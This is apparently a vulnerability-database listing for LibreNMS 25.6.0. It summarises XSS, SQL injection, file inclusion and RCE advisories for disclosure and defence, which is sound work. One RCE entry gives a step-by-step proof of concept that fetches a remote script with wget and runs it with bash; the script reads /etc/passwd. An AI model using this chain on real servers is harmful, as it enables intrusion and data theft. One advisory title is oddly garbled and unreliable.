Search for packages
| purl | pkg:composer/librenms/librenms@25.6.0 |
| Vulnerability | Summary | Fixed by |
|---|---|---|
|
VCID-2t5k-atx8-eycd
Aliases: CVE-2026-26992 GHSA-93fx-g747-695x |
LibreNMS /port-groups name Stored Cross-Site Scripting **/port-groups name Stored Cross-Site Scripting** - HTTP POST - Request-URI(s): "/port-groups" - Vulnerable parameter(s): "name" - Attacker must be authenticated with "admin" privileges. - When a user adds a port group, an HTTP POST request is sent to the Request-URI "/port-groups". The name of the newly created port group is stored in the value of the name parameter. - After the port group is created, the entry is displayed along with some relevant buttons like Edit and Delete. |
Affected by 2 other vulnerabilities. |
|
VCID-5vg7-7y5w-muhw
Aliases: CVE-2025-68614 GHSA-c89f-8g7g-59wj |
Please find POC file here https://trendmicro-my.sharepoint.com/:u:/p/kholoud_altookhy/IQCfcnOE5ykQSb6Fm-HFI872AZ_zeIJxU-3aDk0jh_eX_NE?e=zkN76d ZDI-CAN-28575: LibreNMS Alert Rule API Cross-Site Scripting Vulnerability -- CVSS ----------------------------------------- 4.3: AV:N/AC:L/PR:H/UI:R/S:U/C:L/I:L/A:L -- ABSTRACT ------------------------------------- Trend Micro's Zero Day Initiative has identified a vulnerability affecting the following products: LibreNMS - LibreNMS -- VULNERABILITY DETAILS ------------------------ * Version tested: 25.10.0 * Installer file: NA * Platform tested: NA --- |
Affected by 10 other vulnerabilities. |
|
VCID-7f5s-p5u4-abhh
Aliases: CVE-2026-6204 GHSA-pr3g-phhr-h8fh |
LibreNMS is Vulnerable to Remote Code Execution by Arbitrary File Write ### Summary A vulnerability has been identified that allows an authenticated administrator to execute arbitrary code on the host server. By modifying the binary path settings for built-in network tools and bypassing an input filter, an attacker with administrative privileges can download and execute malicious payloads. ### Details The application allows administrative users to configure the absolute binary paths for network diagnostic tools at `/settings/external/binaries`. This setting does not sufficiently validate ensuring the paths remain restricted to safe, intended executables. These tools are invoked by sending a request to the `GET /ajax/netcmd` endpoint. While there is an existing input filter designed to restrict arguments to valid IP addresses or hostnames, this filter can be bypassed. ### PoC To reproduce this vulnerability, a remote HTTP server should be hosted with a malicious script/executable, ensure the remote server is reachable by the server running LibreNMS. The PoC will use the file `malicious.sh` containing the following content. It will return the content of /etc/passwd and /etc/group, current working directory, username that is running the script, and it will list files of the current directory. ```bash #!/usr/bin/env bash cat /etc/passwd cat /etc/group whoami pwd ls ``` 1. Host a remote HTTP server that the server can reach and place the malicious script on the remote server. For demonstration, I will start it on localhost. <img width="593" height="481" alt="image" src="https://github.com/user-attachments/assets/ef235f8e-089b-462c-b12c-7b5ae2037fc5" /> 2. Make sure the malicious script `malicious.sh` can be downloaded. <img width="516" height="100" alt="image" src="https://github.com/user-attachments/assets/60b04755-e824-4384-81f2-2feacdc8e273" /> 3. Login with an admin account and navigate to Global Settings -> External -> Binary Locations <img width="797" height="201" alt="image" src="https://github.com/user-attachments/assets/f914cc9e-f45b-444f-8f16-058101d84576" /> 4. Change the whois binary path to the path of wget (e.g. /usr/bin/wget). <img width="478" height="58" alt="image" src="https://github.com/user-attachments/assets/57fbf033-ff07-41dc-9bac-2f3b3e897ea6" /> 5. Send the request `GET /ajax/netcmd?cmd=whois&query={remote http server's ip address}/malicious.sh`. The response should contain wget's output, and malicious.sh would be downloaded by the server. <img width="900" height="209" alt="image" src="https://github.com/user-attachments/assets/942b6082-18db-4838-b06c-b98d7fa1f8d0" /> 6. After that, change the whois binary path to the path of bash (e.g. /bin/bash). <img width="751" height="56" alt="image" src="https://github.com/user-attachments/assets/0c11d86e-0dab-4780-bdb7-f328bbb758f8" /> 7. Send the request GET /ajax/netcmd?cmd=whois&query=malicious.sh to execute the script. <img width="846" height="688" alt="image" src="https://github.com/user-attachments/assets/d4dcf8e9-5a75-407c-8dd4-96d11f090dbe" /> ### Impact This vulnerability allows a malicious actor to achieve Remote Code Execution (RCE), potentially leading to complete system compromise, data exfiltration, or lateral movement within the network. ### Remediation Advice Loading Binary Path from a config file instead of exposing settings in WebUI can eliminate this issue. If it is not possible, enforcing more validations and fix the `ip_or_hostname` bypass in https://github.com/librenms/librenms/blob/master/app/Providers/AppServiceProvider.php#L169 to reduce the risk of RCE. ### Prerequisite The attacker must have a valid Administrator account to exploit this vulnerability. |
Affected by 0 other vulnerabilities. |
|
VCID-7s6j-vmn5-p7eh
Aliases: GHSA-7549-ggpq-22w8 |
Duplicate Advisory: LibreNMS is Vulnerable to Remote Code Execution by Arbitrary File Write ## Duplicate Advisory This advisory has been withdrawn because it is a duplicate of GHSA-pr3g-phhr-h8fh. This link is maintained to preserve external references. ## Original Description LibreNMS versions before 26.3.0 are affected by an authenticated remote code execution vulnerability by abusing the Binary Locations config and the Netcommand feature. Successful exploitation requires administrative privileges. Exploitation could result in compromise of the underlying web server. |
Affected by 0 other vulnerabilities. |
|
VCID-8ks5-6azh-67ed
Aliases: CVE-2025-62412 GHSA-6g2v-66ch-6xmh |
LibreNMS alert-rules has a Cross-Site Scripting Vulnerability **Product:** LibreNMS **Vendor:** LibreNMS **Vulnerability Type:** Cross-Site Scripting (XSS) **CVSS Score:** 4.3 (AV:N/AC:L/PR:H/UI:R/S:U/C:L/I:L/A:L) **Affected Version:** 25.8.0 (latest at time of discovery) **POC File:** [Download POC](https://trendmicro-my.sharepoint.com/:u:/p/kholoud_altookhy/EQYQOiGddUtOtz6739YUFU4B5FkNob_TvKBYEA8P6lSRQw?e=lDOR5W) **Ticket:** ZDI-CAN-28105: LibreNMS Alert Rules Cross-Site Scripting Vulnerability |
Affected by 13 other vulnerabilities. |
|
VCID-8nsn-f1fc-6ucm
Aliases: CVE-2025-54138 GHSA-gq96-8w38-hhj2 |
LibreNMS has Authenticated Remote File Inclusion in ajax_form.php that Allows RCE LibreNMS 25.6.0 contains an architectural vulnerability in the `ajax_form.php` endpoint that permits Remote File Inclusion based on user-controlled POST input. The application directly uses the `type` parameter to dynamically include `.inc.php` files from the trusted path `includes/html/forms/`, without validation or allowlisting: ```php if (file_exists('includes/html/forms/' . $_POST['type'] . '.inc.php')) { include_once 'includes/html/forms/' . $_POST['type'] . '.inc.php'; } ``` This pattern introduces a latent Remote Code Execution (RCE) vector if an attacker can stage a file in this include path — for example, via symlink, development misconfiguration, or chained vulnerabilities. > This is not an arbitrary file upload bug. But it does provide a powerful execution sink for attackers with write access (direct or indirect) to the include directory. |
Affected by 16 other vulnerabilities. |
|
VCID-99dx-dees-2fg3
Aliases: CVE-2025-65014 GHSA-5mrf-j8v6-f45g |
LibreNMS has Weak Password Policy A **Weak Password Policy** vulnerability was identified in the user management functionality of the _LibreNMS_ application. This vulnerability allows administrators to create accounts with extremely weak and predictable passwords, such as `12345678`. This exposes the platform to brute-force and credential stuffing attacks. --- |
Affected by 10 other vulnerabilities. |
|
VCID-appm-zs6z-v3b2
Aliases: CVE-2026-26991 GHSA-5pqf-54qp-32wx |
LibreNMS /device-groups name Stored Cross-Site Scripting **/device-groups name Stored Cross-Site Scripting** - HTTP POST - Request-URI(s): "/device-groups" - Vulnerable parameter(s): "name" - Attacker must be authenticated with "admin" privileges. - When a user adds a device group, an HTTP POST request is sent to the Request-URI "/device-groups". The name of the newly created device group is stored in the value of the name parameter. - After the device group is created, the entry is displayed along with some relevant buttons like Rediscover Devices, Edit, and Delete. |
Affected by 2 other vulnerabilities. |
|
VCID-bfnn-xz3r-sfcv
Aliases: CVE-2025-62365 GHSA-86rg-8hc8-v82p |
LibreNMS is vulnerable to Reflected-XSS in `report_this` function Reflected-XSS in `report_this` function in `librenms/includes/functions.php` |
Affected by 16 other vulnerabilities. |
|
VCID-h5y9-mrn4-q7br
Aliases: CVE-2026-26990 GHSA-79q9-wc6p-cf92 |
LibreNMS has a Time-Based Blind SQL Injection in address-search.inc.php A time-based blind SQL injection vulnerability exists in `address-search.inc.php` via the `address` parameter. When a crafted subnet prefix is supplied, the prefix value is concatenated directly into an SQL query without proper parameter binding, allowing an attacker to manipulate query logic and infer database information through time-based conditional responses. |
Affected by 2 other vulnerabilities. |
|
VCID-hj1w-rpxt-4ygp
Aliases: CVE-2025-65013 GHSA-j8cq-7f6p-256x |
LibreNMS vulnerable to Reflected Cross-Site Scripting (XSS) in endpoint `/maps/nodeimage` parameter `Image Name` A Reflected Cross-Site Scripting (XSS) vulnerability was identified in the LibreNMS application at the `/maps/nodeimage` endpoint. The `Image Name` parameter is reflected in the HTTP response without proper output encoding or sanitization, allowing an attacker to craft a URL that, when visited by a victim, causes arbitrary JavaScript execution in the victim’s browser. |
Affected by 10 other vulnerabilities. |
|
VCID-kkqd-nzsw-23cr
Aliases: CVE-2025-65093 GHSA-6pmj-xjxp-p8g9 |
LibreNMS is vulnerable to SQL Injection (Boolean-Based Blind) in hostname parameter in ajax_output.php endpoint A **Boolean-Based Blind SQL Injection** vulnerability was identified in the LibreNMS application at the `/ajax_output.php` endpoint. The `hostname` parameter is interpolated directly into an SQL query without proper sanitization or parameter binding, allowing an attacker to manipulate the query logic and infer data from the database through conditional responses. --- |
Affected by 10 other vulnerabilities. |
|
VCID-mchv-4jpx-audc
Aliases: CVE-2026-26987 GHSA-gqx7-99jw-6fpr |
LibreNMS affected by reflected xss via email field reflected xss via email field |
Affected by 2 other vulnerabilities. |
|
VCID-rq5b-4ktu-syf3
Aliases: CVE-2026-27016 GHSA-fqx6-693c-f55g |
LibreNMS has a Stored XSS in Custom OID - unit parameter missing strip_tags() The `unit` parameter in Custom OID functionality lacks `strip_tags()` sanitization while other fields (`name`, `oid`, `datatype`) are sanitized. The unsanitized value is stored in the database and rendered without HTML escaping, allowing Stored XSS. |
Affected by 2 other vulnerabilities. |
|
VCID-t5mk-a8n2-rkcg
Aliases: CVE-2026-26989 GHSA-6xmx-xr9p-58p7 |
LibreNMS has a Stored XSS in Alert Rule A stored Cross-Site Scripting (XSS) vulnerability exists in LibreNMS (<= 25.12.0) in the creation of Alert Rules. This allows a user with the admin role to inject malicious JavaScript, which will be executed when the alert rules page is viewed. |
Affected by 2 other vulnerabilities. |
|
VCID-uzy1-yh5d-dqbt
Aliases: CVE-2025-55296 GHSA-vxq6-8cwm-wj99 |
LibreNMS allows stored XSS in Alert Template name field A stored Cross-Site Scripting (XSS) vulnerability exists in LibreNMS (<= 25.6.0) in the Alert Template creation feature. This allows a user with the **admin role** to inject malicious JavaScript, which will be executed when the template is rendered, potentially compromising other admin accounts. --- |
Affected by 15 other vulnerabilities. Affected by 0 other vulnerabilities. |
|
VCID-y5mq-m57f-b3bx
Aliases: CVE-2026-26988 GHSA-h3rv-q4rq-pqcv |
LibreNMS: SQL Injection in ajax_table.php spreads through a covert data stream. *SQL Injection in IPv6 Address Search functionality via `address` parameter** A SQL injection vulnerability exists in the `ajax_table.php` endpoint. The application fails to properly sanitize or parameterize user input when processing IPv6 address searches. Specifically, the `address` parameter is split into an address and a prefix, and the prefix portion is directly concatenated into the SQL query string without validation. This allows an attacker to inject arbitrary SQL commands, potentially leading to unauthorized data access or database manipulation. |
Affected by 2 other vulnerabilities. |
|
VCID-z744-37t6-pud6
Aliases: CVE-2025-62411 GHSA-frc6-pwgr-c28w |
LibreNMS has a Stored XSS vulnerability in its Alert Transport name field LibreNMS <= 25.8.0 contains a **Stored Cross-Site Scripting (XSS)** vulnerability in the Alert Transports management functionality. When an administrator creates a new Alert Transport, the value of the `Transport name` field is stored and later rendered in the **Transports** column of the **Alert Rules** page without proper input validation or output encoding. This leads to arbitrary JavaScript execution in the admin’s browser. |
Affected by 13 other vulnerabilities. |
| Vulnerability | Summary | Aliases |
|---|---|---|
| This package is not known to fix vulnerabilities. | ||